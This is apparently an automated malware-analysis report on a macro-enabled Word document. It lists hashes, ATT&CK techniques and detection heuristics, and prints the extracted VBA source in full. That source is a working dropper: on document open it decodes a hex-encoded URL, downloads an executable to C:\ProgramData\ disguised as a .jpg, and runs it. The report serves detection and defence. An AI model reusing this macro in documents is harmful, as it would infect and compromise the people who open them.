Office (OOXML) malware analysis — malicious · 1cfa0038c28635b3

MALICIOUS

Office (OOXML)

41.1 KB Created: 2015-07-13 21:31:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2015-10-01

MD5: d184c9617caa935ac5f9d020de568210 SHA-1: fd74098d4aab752379a9c6dceae966c6b82deaf9 SHA-256: 1cfa0038c28635b39c1d6965e2f54c06bb706d3afa1221567ce0f309bfc51c7e

270 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample contains a VBA macro that executes upon opening the document. This macro, specifically the Document_Open subroutine, is designed to download a file from the hardcoded URL 'the embedded link' and save it to 'C:\ProgramData\' with a randomly generated filename and a .jpg extension. The macro also attempts to execute this downloaded file. This indicates a clear intent to download and execute a second-stage payload.

Heuristics 8

VBA project inside OOXML medium 5 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
    RetVal = Shell(SavePath$, 1)
```
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC

VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
Matched line in script
```
    ADOStream.Write XMLHTTP.responseBody
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
    Set XMLHTTP = CreateObject("Microsoft.XMLHTTP")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```
External relationship high OOXML_EXTERNAL_REL

External target in word/_rels/settings.xml.rels: file:///C:\Users\Дмитрий\AppData\Roaming\Microsoft\Шаблоны\Счет.dotx
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/markup-compatibility/2006 Referenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	2748 bytes
SHA-256: `9539d35ad510d29b982ebdba65f5f5248ee8b8d06c7107f007e5692e7efcfd6e`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1TemplateProject.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Public Function fConvertHexToString(strHexString As String) As String Dim intLenOfString As Integer Dim intCounter As Integer Dim strBuild As String 'Hex String must have a valid length, and it must be an even length If Len(strHexString) = 0 Or Len(strHexString) Mod 2 <> 0 Then Exit Function intLenOfString = Len(strHexString) For intCounter = 1 To Len(strHexString) If intCounter Mod 2 <> 0 Then 'need Hex pairs 'Retrieve the Value of the Hex Pair, then Convert to a Character, 'then Append to a Base String strBuild = strBuild & Chr$(Val("&H" & Mid$(strHexString, intCounter, 2))) End If Next End Function 'Мусор Function Trashcodeb(Value$) As String If S2 >= S3 Then MsgBox "Hello World!" End If Dim A, B As Integer A = dasvxcb B = sfgffsdfgd End Function ' Мусор 2 Function Trashcosfbasd(Value$) As String If S3 >= S4 Then MsgBox "23esfsgadfsfg!" End If Dim C, B As Integer Z = hrtdhfg d = hteASdfgetrfd End Function Private Sub Document_Open() Dim LRandomNumber As Integer Randomize FileName$ = Int((99999999 - 200 + 1) * Rnd + 300000) LinkToFile$ = fConvertHexToString("687474703a2f2f7777772e7461736b6d616e616765726669782e636f6d2f646c2f5461736b4d616e616765724669782e657865") SavePath$ = "C:\ProgramData\" + FileName$ + ".jpg" ' скачиваем файл из интернета adfgehtrf LinkToFile$, SavePath$ ' открываем скачанный файл RetVal = Shell(SavePath$, 1) End Sub Function adfgehtrf(ByVal URL$, ByVal LocalPath$) As Boolean ' Функция скачивает файл по ссылке URL$ ' и сохраняет его под именем LocalPath$ Dim XMLHTTP, ADOStream, FileName On Error Resume Next: Kill LocalPath$ Set XMLHTTP = CreateObject("Microsoft.XMLHTTP") XMLHTTP.Open "GET", Replace(URL$, "\", "/"), "False" XMLHTTP.send Set ADOStream = CreateObject("ADODB.Stream") ADOStream.Type = 1: ADOStream.Open ADOStream.Write XMLHTTP.responseBody ADOStream.SaveToFile LocalPath$, 2 ADOStream.Close: Set ADOStream = Nothing DownloadFile = True Set XMLHTTP = Nothing End Function
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	23040 bytes
SHA-256: `9fd1e6d376fa63e2440caad4be19003e5b48780bd69cc9add8daf0d15ca4d808`

Open this report in the interactive analyzer, or submit your own file for analysis.